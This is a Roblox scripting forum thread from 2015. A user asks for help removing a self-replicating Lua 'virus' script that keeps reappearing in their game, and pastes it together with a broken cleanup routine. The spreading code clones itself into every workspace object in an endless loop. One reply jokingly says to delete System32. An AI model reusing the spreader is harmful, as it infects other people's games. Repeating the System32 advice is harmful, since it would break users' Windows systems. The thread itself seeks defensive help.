|
| 18 Mar 2015 06:35 PM |
I used the command bar but it still didn't work, thing kept coming back. I know a lot of people here are scripters, so I figured it'd be better to post here than message someone and wait a few hours or so... Here's the script:
function spread() local stuff = game.Workspace:GetChildren() for i = 1, #stuff do if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then local clone = script:clone() clone.Parent = stuff[i] end end end
while true do wait(.1) spread() end
function GetAllItems(mdl) local objs = {} function Search(obj) if obj~=workspace then table.insert(objs,obj) end if #obj:GetChildren() > 0 then for i, v in ipairs(obj:GetChildren()) do Search(v) end end end Search(mdl) return objs end
for i, v in ipairs(GetAllItems(workspace)) do if v.className == "Script" then if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" or v.Name == "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere" then v.Parent = game.Lighting t = Instance.new("ObjectValue") t.Name = "IsAVirus" t.Parent = v end end end
for i, v in ipairs(game.Lighting:GetChildren()) do if v:findFirstChild("IsAVirus") then v:remove() end end
print("Virus debugged! All clean!") |
|
|
| Report Abuse |
|
|
RoyKelso
|
  |
| Joined: 12 Nov 2013 |
| Total Posts: 2302 |
|
|
| 18 Mar 2015 06:36 PM |
| You delete system 32, it's a virus |
|
|
| Report Abuse |
|
|
thea96
|
  |
| Joined: 09 Feb 2011 |
| Total Posts: 37634 |
|
| |
|
kolwalski
|
  |
| Joined: 01 May 2009 |
| Total Posts: 7750 |
|
|
| 18 Mar 2015 06:37 PM |
| http://www.roblox.com/Ro-Defender-Plugin-v8-6-item?id=142273772 |
|
|
| Report Abuse |
|
|
|
| 18 Mar 2015 06:37 PM |
@Thea-
The only ones I use are scripts (which I obviously know very little about) and meshes. |
|
|
| Report Abuse |
|
|
| |
|
kolwalski
|
  |
| Joined: 01 May 2009 |
| Total Posts: 7750 |
|
| |
|
| |
|